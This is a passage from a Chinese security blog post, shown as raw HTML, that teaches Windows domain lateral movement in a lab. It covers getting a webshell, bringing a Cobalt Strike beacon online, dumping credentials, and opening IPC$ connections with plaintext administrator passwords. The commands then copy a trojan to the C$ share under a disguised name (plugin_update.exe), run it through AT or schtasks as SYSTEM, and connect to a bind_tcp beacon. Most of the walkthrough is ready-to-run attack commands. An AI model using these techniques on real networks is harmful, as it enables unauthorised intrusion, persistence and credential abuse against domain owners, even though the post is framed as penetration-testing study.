

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/2.png">
  <link rel="icon" href="/img/2.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Yf3te">
  <meta name="keywords" content="">
  
    <meta name="description" content="横向移动linux、windows移动 环境：  思路&amp;流程：获取server的webshell进入内网域，cs上线server，信息收集，端口扫描（判断目标域内主机），密码凭证（cs插件）、木马上传、木马移动 用户    DC !@#qazwsx0 192.168.41.10    yf1 !@#qazwsx1 192.168.41.10   yf2 !@#qazwsx2 192.1">
<meta property="og:type" content="article">
<meta property="og:title" content="横向移动基础篇">
<meta property="og:url" content="http://example.com/2025/05/05/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E5%9F%BA%E7%A1%80%E7%AF%87/index.html">
<meta property="og:site_name" content="Yf3te--枯木怯逢春...">
<meta property="og:description" content="横向移动linux、windows移动 环境：  思路&amp;流程：获取server的webshell进入内网域，cs上线server，信息收集，端口扫描（判断目标域内主机），密码凭证（cs插件）、木马上传、木马移动 用户    DC !@#qazwsx0 192.168.41.10    yf1 !@#qazwsx1 192.168.41.10   yf2 !@#qazwsx2 192.1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/11.jpg">
<meta property="article:published_time" content="2025-05-04T17:11:00.000Z">
<meta property="article:modified_time" content="2025-05-04T17:21:02.955Z">
<meta property="article:author" content="Yf3te">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/11.jpg">
  
  
  
  <title>横向移动基础篇 - Yf3te--枯木怯逢春...</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">
<link rel="stylesheet" href="/css/cloudedGlass.css">
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":50,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"ground_glass":{"enable":true},"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"nPsiBpqAh9nfJ5Dy1WuaF7QX-MdYXbMMI","app_key":"uHgPDZvMgamWIL1SjZs4NpY4","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Yf3_te的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/9.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="横向移动基础篇"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-05 01:11" pubdate>
          2025年5月5日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          34 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">横向移动基础篇</h1>
            
            
              <div class="markdown-body">
                
                <meta name="referrer" content="no-referrer"/>

<h2 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h2><p>linux、windows移动</p>
<p>环境：</p>
<p><img src="https://s2.loli.net/2025/05/05/ao6ZflqtRTiwBsv.png" srcset="/img/loading.gif" lazyload alt="image-20241010104344456"></p>
<p>思路&amp;流程：获取server的webshell进入内网域，cs上线server，信息收集，端口扫描（判断目标域内主机），密码凭证（cs插件）、木马上传、木马移动</p>
<p>用户</p>
<table>
<thead>
<tr>
<th>DC</th>
<th>!@#qazwsx0</th>
<th>192.168.41.10</th>
</tr>
</thead>
<tbody><tr>
<td>yf1</td>
<td>!@#qazwsx1</td>
<td>192.168.41.10</td>
</tr>
<tr>
<td>yf2</td>
<td>!@#qazwsx2</td>
<td>192.168.41.10</td>
</tr>
<tr>
<td>yf3</td>
<td>!@#qazwsx3</td>
<td>192.168.41.10</td>
</tr>
<tr>
<td>yf4</td>
<td>!@#qazwsx4</td>
<td>192.168.41.10</td>
</tr>
<tr>
<td>yf5</td>
<td>!@#qazwsx5</td>
<td>192.168.41.10</td>
</tr>
</tbody></table>
<p><img src="https://s2.loli.net/2025/05/05/hdaVtE4PFgSGyLX.png" srcset="/img/loading.gif" lazyload alt="image-20241010123334874"></p>
<h2 id="基础信息收集"><a href="#基础信息收集" class="headerlink" title="基础信息收集"></a>基础信息收集</h2><pre><code class="hljs">判断域环境：shell ipconfig /all
</code></pre>
<p><img src="https://s2.loli.net/2025/05/05/yDIvtxC1duNH9Xc.png" srcset="/img/loading.gif" lazyload alt="image-20241010143109575"></p>
<pre><code class="hljs">ping获取DC的IP：shell ping yf.com
</code></pre>
<p><img src="https://s2.loli.net/2025/05/05/OVogUDQ7IJcEkwH.png" srcset="/img/loading.gif" lazyload alt="image-20241010170752886"></p>
<p>通过c端的端口扫描，扫出存活主机：</p>
<p><img src="https://s2.loli.net/2025/05/05/1EPCnGgjFxQTaeB.png" srcset="/img/loading.gif" lazyload alt="image-20241010172523811"></p>
<p>在目标列表查看</p>
<p><img src="https://s2.loli.net/2025/05/05/voq4RzC5Wd9iGme.png" srcset="/img/loading.gif" lazyload alt="image-20241010173146384"></p>
<hr>
<h2 id="工具篇"><a href="#工具篇" class="headerlink" title="工具篇"></a>工具篇</h2><h3 id="1、IPC"><a href="#1、IPC" class="headerlink" title="1、IPC$"></a>1、IPC$</h3><p>IPC$是共享”命名管道”的资源，他是为了让<strong>进程间通信</strong>而开放的命令管道，通过提供就信任的用户名和命令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对计算机的访问。</p>
<p>利用<code>IPC$</code>，连接者和目标主机利用建立的连接可以得到目标i主机上的目录结构、用户列表等信息。</p>
<h4 id="使用条件"><a href="#使用条件" class="headerlink" title="使用条件"></a>使用条件</h4><ul>
<li>开放139、445端口</li>
</ul>
<p>IPC$可以实现远程登录及对默认共享的访问，而139端口的开启则表示netbios协议（用于局域网（LAN）中的计算机之间进行通信的应用层协议）的应用，我们可以通过139、445端口来实现对共享文件&#x2F;打印机的访问，因此一般来说，IPC$连接是需要139或445端口来支持的。</p>
<p>IPC$连接一般走445端口，不通的话走139端口</p>
<ul>
<li>目标开启了IPC$文件共享服务及默认开启的共享</li>
</ul>
<p>默认共享是为了方便管理员的远程管理而默认开启的</p>
<p>默认共享包括：所有逻辑磁盘（C：、D：、E：）和系统目录WINNT、WINDOWS（ADMIN$）。IPC连接则可以实现对这些默认的共享的访问。</p>
<p>可以通过命令 <strong>net share</strong> 命令来查看共享情况</p>
<p><img src="https://s2.loli.net/2025/05/05/ILjalFbdBzro3VG.png" srcset="/img/loading.gif" lazyload alt="image-20241011141123405"></p>
<ul>
<li>需要目标机的管理员账号和密码</li>
</ul>
<p>默认只有被添加到远程计算机管理员组的域用户才有权限对admin$目录建立IPC连接，且处于安全考虑，默认情况下本地Administrator会被禁用（本地都无法使用Administrator），只有重新启用本地Administrator用户，才能通过本地Administrator来建立IPC$连接</p>
<h4 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-number">1</span>、连接<br>net use \\<span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span>\ipc<span class="hljs-variable">$</span> /user:administrator <span class="hljs-string">&quot;1qaz@WSX3e&quot;</span><br><br><span class="hljs-number">2</span>、查看连接情况<br>net use<br><br><span class="hljs-number">3</span>、查看目标主机的时间<br>net time \\<span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span><br><br><span class="hljs-number">4</span>、删除连接<br>net use \\<span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span>\ipc<span class="hljs-variable">$</span> /<span class="hljs-built_in">del</span><br>net use * /<span class="hljs-built_in">del</span> /y<br><br><span class="hljs-number">5</span>. 文件上传下载<br><span class="hljs-built_in">copy</span> shell.exe \\<span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span>\c<span class="hljs-variable">$</span>\windows\temp\plugin_update.exe<br><span class="hljs-built_in">copy</span> \\ <span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span> \c<span class="hljs-variable">$</span>\<span class="hljs-number">59</span>.exe c:\<br><br><span class="hljs-number">6</span>. 查看目标主机文件<br><span class="hljs-built_in">dir</span> \\<span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span>\c<span class="hljs-variable">$</span><br><br><span class="hljs-number">7</span>. 开放/关闭 ipc<span class="hljs-variable">$</span> 共享。<br>net share ipc<span class="hljs-variable">$</span><br>net share ipc<span class="hljs-variable">$</span> /<span class="hljs-built_in">del</span><br><br><span class="hljs-number">8</span>. 共享计算机 C 盘。<br>net share C=c:\<br><br><span class="hljs-number">9</span>. 映射共享磁盘到本地<br>net use z: \\<span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span>\c<span class="hljs-variable">$</span> /user:administrator <span class="hljs-string">&quot;1qaz@WSX3e&quot;</span><br><br><span class="hljs-number">10</span>. 查看/删除共享的资源。<br>net share<br>net share C /<span class="hljs-built_in">del</span><br><br><span class="hljs-number">11</span>. 取消IPC远程连接。<br>net use c: /<span class="hljs-built_in">del</span><br>net use * /<span class="hljs-built_in">del</span> /y<br><br></code></pre></td></tr></table></figure>

<h4 id="IPC-连接报错兼原因"><a href="#IPC-连接报错兼原因" class="headerlink" title="IPC$连接报错兼原因"></a>IPC$连接报错兼原因</h4><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">错误号</span> <span class="hljs-number">5</span><span class="hljs-string">，拒绝访问</span> <span class="hljs-string">【很可能你使用的用户不是管理员权限，先提升权限】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">51</span><span class="hljs-string">，Windows</span> <span class="hljs-string">无法找到网络路径</span> <span class="hljs-string">【网络有问题】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">53</span><span class="hljs-string">，找不到网络路径</span> <span class="hljs-string">【ip</span> <span class="hljs-string">地址错误；目标未开机；目标</span> <span class="hljs-string">lanmanserver</span> <span class="hljs-string">服务</span><br><span class="hljs-string">未启动；目标有防火墙（端口过滤）】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">67</span><span class="hljs-string">，找不到网络名</span> <span class="hljs-string">【你的</span> <span class="hljs-string">lanmanworkstation</span> <span class="hljs-string">服务未启动；目标删除了</span><br><span class="hljs-string">ipc$；】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">1219</span><span class="hljs-string">，提供的凭据与已存在的凭据集冲突</span> <span class="hljs-string">【你已经和对方建立了一个ipc$，请删除后再连】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">1326</span><span class="hljs-string">，未知的用户名或错误密码</span> <span class="hljs-string">【用户名或密码错误】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">1385</span><span class="hljs-string">，登录失败：未授予用户在此计算机上的请求登录类型</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">1792</span><span class="hljs-string">，试图登录，但是网络登录服务没有启动</span> <span class="hljs-string">【目标NetLogon服务未启动[连接域控会出现此</span><br><span class="hljs-string">情况]】</span><br><span class="hljs-string">错误号</span> <span class="hljs-number">2242</span><span class="hljs-string">，此用户的密码已经过期</span> <span class="hljs-string">【目标有帐号策略，强制定期要求更改密码】</span><br></code></pre></td></tr></table></figure>

<hr>
<h3 id="IPC-AT-Schtasks"><a href="#IPC-AT-Schtasks" class="headerlink" title="IPC+AT+Schtasks"></a>IPC+AT+Schtasks</h3><h4 id="AT简介"><a href="#AT简介" class="headerlink" title="AT简介"></a>AT简介</h4><p>AT命令可在指定时间和日期、在指定计算机上运行命令和程序，用于运行我们的木马。且只适用于windows server 2012等之前的老版本。</p>
<h4 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h4><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs dos"><span class="hljs-built_in">net</span> use \\<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">41</span>.<span class="hljs-number">10</span>\c$ /user:administrator &quot;<span class="hljs-number">1</span>qaz@WSX3e&quot;<br><span class="hljs-built_in">copy</span> <span class="hljs-number">59</span>.exe \\<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">41</span>.<span class="hljs-number">10</span>\c$<br>查看远程主机时间：<span class="hljs-built_in">net</span> <span class="hljs-built_in">time</span> \\<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">41</span>.<span class="hljs-number">10</span><br><span class="hljs-built_in">AT</span>命令添加任务：<span class="hljs-built_in">at</span> \\<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">41</span>.<span class="hljs-number">10</span> <span class="hljs-number">19</span>:<span class="hljs-number">08</span> c:\<span class="hljs-number">59</span>.exe<br><span class="hljs-built_in">AT</span>命令删除任务：<span class="hljs-built_in">at</span> \\<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">41</span>.<span class="hljs-number">10</span> <span class="hljs-number">1</span> /delete<br><span class="hljs-built_in">AT</span>命令查看任务：<span class="hljs-built_in">at</span> \\<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">41</span>.<span class="hljs-number">10</span> #查看<span class="hljs-built_in">at</span>任务列表，已经执行了的，不会显示。<br></code></pre></td></tr></table></figure>

<h4 id="注意项"><a href="#注意项" class="headerlink" title="注意项"></a>注意项</h4><blockquote>
<p>问题：执行at命令时，显示绑定句柄无效。<br>解决：echo 192.168.41.10 RemoteHost &gt; C:\Windows\System32\drivers\etc\hosts<br>AT命令在windows server 2012等新版系统中已被弃用<br>AT命令如果找不到网络路径，则判断是目标主机已禁用 Task Scheduler服务</p>
</blockquote>
<h4 id="Schtasks简介"><a href="#Schtasks简介" class="headerlink" title="Schtasks简介"></a>Schtasks简介</h4><p>用于windows server 2012及其之后的系统，命令允许管理员创建、删除、查询、更改、终止本地或远程系统的上的计划任务。</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">/Create</span> 创建新计划任务。<br><span class="hljs-string">/Delete</span> 删除计划任务。<br><span class="hljs-string">/Query</span> 显示所有计划任务。<br><span class="hljs-string">/Change</span> 更改计划任务属性。<br><span class="hljs-string">/Run</span> 按需运行计划任务。<br><span class="hljs-string">/End</span> 中止当前正在运行的计划任务。<br><span class="hljs-string">/ShowSid</span> 显示与计划的任务名称相应的安全标识符。<br>/? 显示此帮助消息。<br></code></pre></td></tr></table></figure>

<h4 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h4><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-comment">#创建任务</span><br>schtasks <span class="hljs-string">/create</span> <span class="hljs-string">/tn</span> task1 <span class="hljs-string">/U</span> 域\域用户 <span class="hljs-string">/P</span> 域用户密码 <span class="hljs-string">/tr</span> 命令<span class="hljs-params">(木马程序)</span> <span class="hljs-string">/sc</span> ONSTART <span class="hljs-string">/s</span> 域机器 ip <span class="hljs-string">/RU</span> system<br><br><span class="hljs-comment">#运行任务</span><br>schtasks <span class="hljs-string">/run</span> <span class="hljs-string">/tn</span> task1 <span class="hljs-string">/s</span> 192.168.41.10 <span class="hljs-string">/U</span> 域/域用户 <span class="hljs-string">/P</span> 域用户密码<br>或<br>schtasks <span class="hljs-string">/run</span> <span class="hljs-string">/s</span> 192.168.41.10 <span class="hljs-string">/tn</span> beacon <span class="hljs-string">/i</span>    <span class="hljs-comment">#运行beacon任务</span><br><br><br><span class="hljs-comment">#删除任务</span><br>schtasks <span class="hljs-string">/F</span> <span class="hljs-string">/delete</span> <span class="hljs-string">/tn</span> task1 <span class="hljs-string">/s</span> 域机器ip <span class="hljs-string">/U</span> 域\域用户 <span class="hljs-string">/p</span> 域用户密码<br>或<br>schtasks <span class="hljs-string">/delete</span> <span class="hljs-string">/s</span> 192.168.41.10 <span class="hljs-string">/tn</span> beacon <span class="hljs-string">/f</span>  <span class="hljs-comment">#删除beacon任务</span><br><br><br>schtasks <span class="hljs-string">/create</span> 创建新的计划任务。<br>		<span class="hljs-string">/sc</span> schedule 指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。<br>		<span class="hljs-string">/mo</span> modifier 指定任务在其计划类型内的运行频率。这个参数对于 MONTHLY 计划是必需的。<br>					对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划，这个参数有效，但也可选。默认值为 1。<br>		<span class="hljs-string">/tr</span> &lt;TaskRun&gt; 指定任务运行的程序或命令。如果忽略该路径，SchTasks.exe 将假定文件在 Systemroot\System32 目录下。<br>		<span class="hljs-string">/tn</span> &lt;TaskName&gt; 指定任务的名称。<br><br></code></pre></td></tr></table></figure>

<h3 id="IPC实操"><a href="#IPC实操" class="headerlink" title="IPC实操"></a>IPC实操</h3><h4 id="1、凭证获取"><a href="#1、凭证获取" class="headerlink" title="1、凭证获取"></a>1、<strong>凭证获取</strong></h4><p><img src="https://s2.loli.net/2025/05/05/UQL2XepFWIz8Djf.png" srcset="/img/loading.gif" lazyload alt="image-20241010172607293"></p>
<p>不一定能抓取到，抓取的规则一般是：其他主机远程连接的痕迹遗留之类的</p>
<p><img src="https://s2.loli.net/2025/05/05/OtEWBeXSYxmqPFc.png" srcset="/img/loading.gif" lazyload alt="image-20241010173310494"></p>
<h4 id="2、连接域控"><a href="#2、连接域控" class="headerlink" title="2、连接域控"></a>2、<strong>连接域控</strong></h4><p>方式一：直接用命令：shell net use \192.168.41.10\ipc$ “!@#qazwsx258” &#x2F;user:yf.com\administrator</p>
<p>方式二：cs插件实现<img src="https://s2.loli.net/2025/05/05/eA1GkO2mLzc7fyl.png" srcset="/img/loading.gif" lazyload alt="image-20241010223253213"></p>
<p>shell net use 显示成功连接<img src="https://s2.loli.net/2025/05/05/8DxKCBntmpgbAXw.png" srcset="/img/loading.gif" lazyload alt="image-20241011152931360"></p>
<p>在跳板机上部署正向连接木马bind_tcp，监听本地2222端口</p>
<p><img src="https://s2.loli.net/2025/05/05/ysJD6qQELORec2a.png" srcset="/img/loading.gif" lazyload alt="image-20241011152636587"></p>
<h4 id="3、转移木马（正向木马）"><a href="#3、转移木马（正向木马）" class="headerlink" title="3、转移木马（正向木马）"></a>3、<strong>转移木马（正向木马）</strong></h4><p>shell copy 2.exe \192.168.41.10\c$</p>
<p><img src="https://s2.loli.net/2025/05/05/iG3Xq17OhvuamDK.png" srcset="/img/loading.gif" lazyload alt="image-20241011153013487"></p>
<p>进一步验证，成功移动:dir \192.168.41.10\C$</p>
<p><img src="https://s2.loli.net/2025/05/05/4jfK3zVGQFvAUMm.png" srcset="/img/loading.gif" lazyload alt="image-20241011163406778"></p>
<h4 id="4-1、打定时任务运行"><a href="#4-1、打定时任务运行" class="headerlink" title="4.1、打定时任务运行"></a>4.1、<strong>打定时任务运行</strong></h4><p>schtasks &#x2F;S 192.168.41.10 &#x2F;U administrator &#x2F;P !@#qazwsx258 &#x2F;Create &#x2F;TN test &#x2F;TR ‘c:\2.exe’ &#x2F;SC once &#x2F;ST 16:02 &#x2F;F     时间自定义，时间一过自动执行</p>
<p><img src="https://s2.loli.net/2025/05/05/irXRPHexabJgkyY.png" srcset="/img/loading.gif" lazyload alt="image-20241011153801620"></p>
<h4 id="4-2、未设置具体时间的定时任务"><a href="#4-2、未设置具体时间的定时任务" class="headerlink" title="4.2、未设置具体时间的定时任务"></a>4.2、<strong>未设置具体时间的定时任务</strong></h4><p>schtasks &#x2F;S 192.168.41.10 &#x2F;U administrator &#x2F;P !@#qazwsx258 &#x2F;Create &#x2F;TN test &#x2F;TR ‘c:\2.exe’ &#x2F;SC DAILY  &#x2F;F   设置一个待运行的定时任务</p>
<p><img src="https://s2.loli.net/2025/05/05/iPXCFf5QaGbKsvH.png" srcset="/img/loading.gif" lazyload alt="image-20241011154302580"></p>
<p>schtasks &#x2F;S 192.168.41.10 &#x2F;U administrator &#x2F;P !@#qazwsx258 &#x2F;Run &#x2F;TN test  #运行test任务</p>
<p><img src="https://s2.loli.net/2025/05/05/IokvEbHyajnURVi.png" srcset="/img/loading.gif" lazyload alt="image-20241011162114963"></p>
<h4 id="5、查看定时任务"><a href="#5、查看定时任务" class="headerlink" title="5、查看定时任务"></a>5、查看定时任务</h4><p>chcp 65001  #修改编码，方便后面查看任务</p>
<p>schtasks &#x2F;S 192.168.41.10 &#x2F;U administrator &#x2F;P !@#qazwsx258 &#x2F;Query &#x2F;TN test &#x2F;V  #查看任务</p>
<p><strong>注</strong>：有时候能查看不到任务，我们可以用之前的创建任务成功或者直接运行任务来确认，如下</p>
<p><img src="https://s2.loli.net/2025/05/05/HPvNd7WVBLFz2rS.png" srcset="/img/loading.gif" lazyload alt="image-20241011161118594"></p>
<h4 id="6、待定时任务运行后连接"><a href="#6、待定时任务运行后连接" class="headerlink" title="6、待定时任务运行后连接"></a>6、<strong>待定时任务运行后连接</strong></h4><p>connect 192.168.41.10 2222，上线</p>
<p><img src="https://s2.loli.net/2025/05/05/ixVnd5PfzGX71Jm.png" srcset="/img/loading.gif" lazyload alt="image-20241011162227082"></p>
<h4 id="7、删除定时任务"><a href="#7、删除定时任务" class="headerlink" title="7、删除定时任务"></a>7、删除定时任务</h4><p>schtasks &#x2F;delete &#x2F;tn test &#x2F;s 192.168.41.10 &#x2F;u administrator &#x2F;p !@#qazwsx258 &#x2F;F</p>
<p><img src="https://s2.loli.net/2025/05/05/Duv2ZmtiWPwkSnL.png" srcset="/img/loading.gif" lazyload alt="image-20241011162444349"></p>
<hr>
<h3 id="IPC-SC"><a href="#IPC-SC" class="headerlink" title="IPC+SC"></a>IPC+SC</h3><h4 id="sc简介"><a href="#sc简介" class="headerlink" title="sc简介"></a>sc简介</h4><p><code>sc</code> 是 Windows 的服务控制命令，用于创建、配置、管理、注册、删除和查询系统服务。</p>
